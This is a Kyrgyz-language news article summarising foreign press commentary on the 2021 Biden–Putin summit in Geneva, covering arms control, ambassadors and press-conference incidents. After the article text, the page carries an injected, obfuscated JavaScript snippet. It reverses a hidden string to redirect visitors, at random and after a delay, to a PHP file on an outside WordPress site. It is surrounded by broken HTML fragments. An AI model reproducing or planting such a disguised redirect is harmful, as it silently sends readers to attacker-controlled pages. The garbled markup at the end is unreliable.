Женева саммити боюнча чет өлкөлүктөрдүн пикирлери кандай?
АКШнын президенти Джо Байден жана Россиянын президенти Владимир Путиндин саммити кечээ аяктады. Саммиттин жыйынтыгын Американын лидери “эки улуу державанын” ортосундагы жолугушуу деп атап, ал “бетме-бет жолугушуудан артык эч нерсе жок”,-деди. Ал эми Путин болсо, “жолугушуу жемишин бериши керек”,- деген пикирин билдирди. “Жолугушуу тыкыр дайындалып, эки тараптын макулдашуусу менен өткөрүлдү”,-деп жазат Associated Press басылмасы. Аталган басылма: АКШнын беш президентинин башкаруусун көргөн Путинди саясий айдыңда өтө таасирдүү фигура экенин Байден моюндады,- деп жазды. «Ал өтө акылдуу, мыкты. Ал чындыгында өтө татыктуу атаандаш,- дейт Байден.
Эч кандай милдеттенмелерсиз…
Лидерлердин жолугушуусунда эч кандай милдеттенмелер айтылган жок. Ак үйдүн берген маалыматына ылайык, жолугушуудан кийин эки тарап тең элчилерди өз кызматтарына кайтарышат. Байдендин админитрациясынын өкүлүнүн билдирүүсүндө, «аскердик көзөмөл боюнча тил табышса болот». Эскперттер эки лидерге аскердик көзөмөлдү күчөтүү боюнча жаңы келишимдерди иштеп чыгууну сунушташты. Байкоочулардын баамында, буга чейин Москва жана Вашингтон стратегиялык туруктуулуктун алкагында, 5 жылга созула турган аскердик көзөмөл боюнча Америка-Россия пакты тууралуу жаңы келишимдерди иштеп чыгууга кызыгышкан.
Айрым серепчилер айтымында, карыш-катнаштарды жакшыртууга Путин дагы кызыкдар. Анын негизги максаты Москванын өзөктүк кызыкчылыктарын коргоого багытталган “кызыл чекти” коюу. Путиндин алдында Россиянын коопсуздук көйгөйлөрүн жөнгө салып, кооптуу дестабилизацияга бөгөт коюу максаты турат. Москванын негизги “кызыл чеги” – бул Украинанын НАТОго кирүүгө ашыккандыгы.
Жолугушууга чейин Россия бир катар өтө татаал сүйлөшүүлөрдү жүргүзүп, Иран менен өзөктүк келишимди жөнгө салууга даяр экендигин билдирип, Жакынкы Чыгыштагы чыңалууну тынчтык жол менен жокко чыгаруу үчүн АКШ менен кызматташууга даярдыгын билдирген. Эксперттердин баамында, Кремль Сирия боюнча келишимди иштеп чыгып, Москванын аскердик кампаниясы Башар Асадка жарандык согуштан жапа чеккен өлкөнүн жарымын көзөмөлгө алууга көмөктөшүүгө даяр, бирок ошол эле учурда АКШнын аскердик катышуусу аймакта жарым-жартылай сакталып турат.
Америка президентинин администрациясынын дагы бир таасирдүү өкүлү Reuters агенттигине маалымат берип жатып, АКШ менен Россия «улуттук кызыкчылыктарды жана дүйнөдө тынчтыкты камсыздоого багытталган биргелешкен кызматташууну арттырууга кызыкдар”. Маалымат агенттиги эки мамлекеттин келишпестиктери болгону менен, аскердик көзөмөлдү күчөтүү бул тарыхий прогресс деген фактты тастыктады. Февраль айында Россия менен АКШ стратегиялык өзөктүк куралдардын санын чектей турган келишимди дагы 5 жылга узарткан. Тараптар чечилбеген суроолорго карабастан, туруктуу баарлашууну каалашат.
Ал эми ВВС маалымат агенттиги, 5 саатка даярдалган жолугушуу узакка созулган жок, деп жазып, жалпысынан Владимир Путиндин пресс-конференциядагы билдирүүлөрүн гана маалымдады.
“Көпүрө” курса болот
2018-жылы Хельсинкидеги жолугушууга салыштырмалуу, Женевадагы жолугушуу кыйла жылуу өттү, дейт Guardian басылмасы. Саммит дипломатиялык чектин негизинде өттү: кол алышуу, бир нече саатка созулган сүйлөшүүлөр, анын жыйынтыгы менен өзүнчө өткөрүлгөн пресс-конференциялар. Хельсинкидеги “муздак көз караштарга” чекит коюлду. Жолугушууда айтылгандар боюнча протоколдор макулдашылат. Тараптардын буга чейинки келишпестиктеринин айынан, жолугушууга чейин жакшы жыйынтык күтүү күмөндүү болгон. Бирок, кандай болгон күндө да тараптардын жолугушуусунан жыйынтык чыкты десе болот. Эң алгачкы “жөнөкөй” жыйынтыктардын бири бул элчилерди калыбына келтирүү, деп Британиянын маалымат басылмасы жазды. «Путин өзүн татыктуу көрсөттү. Ал саммит өтө турган Villa La Grange вилласына Байденден мурда келди «, — деп басылманын корреспонденти белгилешти.
Азырынча эки лидердин ортосундагы ажырым чоң, бирок көпүрө курса болот, дейт Франциянын Le Figaro гезити. Байкоочунун оюу боюнча, эки алдыңкы держава «бирин бири кыйраткысы келген эки улуу держава эми системалуу атаандаштардан эмес «. «Азыр лидерлер чекти карманып турушат, балким эки тарапты тең бирдей кызыктырган айрым суроолор боюнча кызматташууга барышат. Стратегиялык арсеналдарды да чектөө каралды», — дейт аталган гезит.
Ал эми SBC телеканалы “Россия Федерациясынын президенти котормочу аркылуу репортерлорго Байден аны Ак үйгө чакырбаганын айтты”,- деп баса белгиледи. “Мындай жолугушуулар “атайы шарттарда” өтүүсү керек. Путин Байденди «конструктивдүү, оор басырыктуу тажрыйбалуу инсан»,- деди. Аны менен баарлашуу тиешелүү деңгээлде өтөт. «Анын тажрыйбалуулугун бир карап эле баамдадым”, — дейт Путин Байден тууралуу айтып жатып.
Моралдык баалуулуктар жөнүндө
Россиянын президентинин айтымында, Байден өзүнүн энеси тууралуу айтканы, анын моралдык баалуулуктарды жогору койгонунан кабар берет. «Менин оюмча, биз бири бирибизди түшүнө алдык. Бирок бул албетте жакын достуктун белгиси эмес”, — дейт Путин «.
Эске салсак, 2001-жылы АКШнын ошол кездеги президенти Джордж Буш, Путин менен Словенияда болгон жолугушуусунан кийин, “мен Путиндин көзүнөн ишеним көрдүм, биз мыкты баарлаштык”,-деген болчу.
Франциянын BFMTV телеканалы, лидерлер тууралуу айтып жатып, “Россиянын президенти өзүнүн көп жылдык тажрыйбасына таянды. Албетте, ал 1999-жылдан бери АКШнын 5 президенти менен жолугушту. Путин каалаган максатына жетти. Саммиттин өтүшү менен Россиянын дүйнөлүк аренадагы аброю көтөрүлүп, орду бекемделди. Женева саммити – бул анын алгачкы старты эмес, алга сүрөй турган тепкич. Бул узакка созулган келишпестикти жөнгө сала турчу жагдай», — дейт Брукингс аналитикалык борборунун өкүлү Пайфер.
Ошол эле учурда…
Fox News телеканалынын комментаторлору Россиянын президентинин коопсуздук кызматы токтотуп калган айрым америкалык журналисттердин «корс» мамилесин сындап өтүштү. «Эгерде алар (журналисттер) чийилген линиядан өтпөй тура алышпаса, анда аларда жоопкерчилик деген жок. «Алар (АКШ журналисттери) угуу касиетин жоготуп койгондору үчүн, залдан куулушту, эми алар чектен ашкан агрессивдүүлүк жөнүндө дүйнө жүзүнө жар салышат”,- дейт телеканалдын комментаторлору.
Эске салсак, россиялык журналисттерди Байдендин пресс-конференциясына киргизишкен жок, бирок ошол эле маалда америкалык репортерлор эч кандай тоскоолдуктарсыз Россиянын президентинин пресс-конференциясына катыша алышты.
{if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script>totass4.cdnvideo.ru/width/960_51849019/tass/m2/uploads/i/20210616/6182121.jpg» alt=»CNN: Байден и его помощники внимательно смотрят пресс-конференцию Путина — Международная панорама — ТАСС» /></figure>
<figure class=)
